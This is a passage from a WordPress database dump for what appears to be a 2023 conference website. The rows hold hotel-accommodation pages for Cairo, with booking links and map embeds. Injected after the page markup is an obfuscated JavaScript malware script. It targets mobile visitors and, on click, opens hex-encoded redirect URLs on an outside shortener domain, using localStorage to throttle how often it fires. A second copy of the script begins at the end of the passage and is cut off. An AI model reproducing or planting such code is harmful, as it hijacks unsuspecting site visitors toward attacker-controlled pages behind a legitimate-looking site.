color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"4783\" primary_title=\"Grand Nile Tower Hotel\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.grandniletower.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fgrand-nile-tower-hotel%2F|title:Grand%20Nile%20Tower%20Hotel\"]</p>\n<ul>\n<li>https://www.grandniletower.com/</li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h5></h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F\"]</p>\n<ul>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<ul>\n<li>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5>Deadline for the Special Rates is August 15, 2023</h5>\n</li>\n</ul>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-06-24 01:01:49','2023-06-24 01:01:49','',2685,'https://gsw2023.com/?p=4787',0,'revision','',0),
(4788,1,'2023-06-24 01:08:56','2023-06-24 01:08:56','','OLYMPUS DIGITAL CAMERA','OLYMPUS DIGITAL CAMERA','inherit','open','closed','','olympus-digital-camera','','','2023-06-24 01:08:56','2023-06-24 01:08:56','',2685,'https://gsw2023.com/wp-content/uploads/2023/06/Cairo_-_Garden_City_-_Hyatt_from_the_Nile.jpg',0,'attachment','image/jpeg',0),
(4789,1,'2023-06-24 01:09:12','2023-06-24 01:09:12','<p>[vc_row][vc_column][vc_hoverbox image=\"2683\" primary_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fgb%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%23scmisc%3Dnav_hoteldetail_ic|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5></h5>\n<h5>Deadline for the Special Rates is August 10, 2023</h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][vc_hoverbox image=\"2688\" primary_title=\"Steigenberger Hotel El Tahrir\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Steigenberger Hotel El Tahrir\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.steigenberger.com%2Fen%2Fhotels%2Fall-hotels%2Fegypt%2Fcairo%2Fsteigenberger-el-tahrir-cairo|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fsteigenberger-hotel-el-tahrir%2F\"]</p>\n<ul>\n<li><a href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"4788\" primary_title=\"Grand Nile Tower Hotel\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.grandniletower.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fgrand-nile-tower-hotel%2F|title:Grand%20Nile%20Tower%20Hotel\"]</p>\n<ul>\n<li>https://www.grandniletower.com/</li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h5></h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F\"]</p>\n<ul>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<ul>\n<li>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5>Deadline for the Special Rates is August 15, 2023</h5>\n</li>\n</ul>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 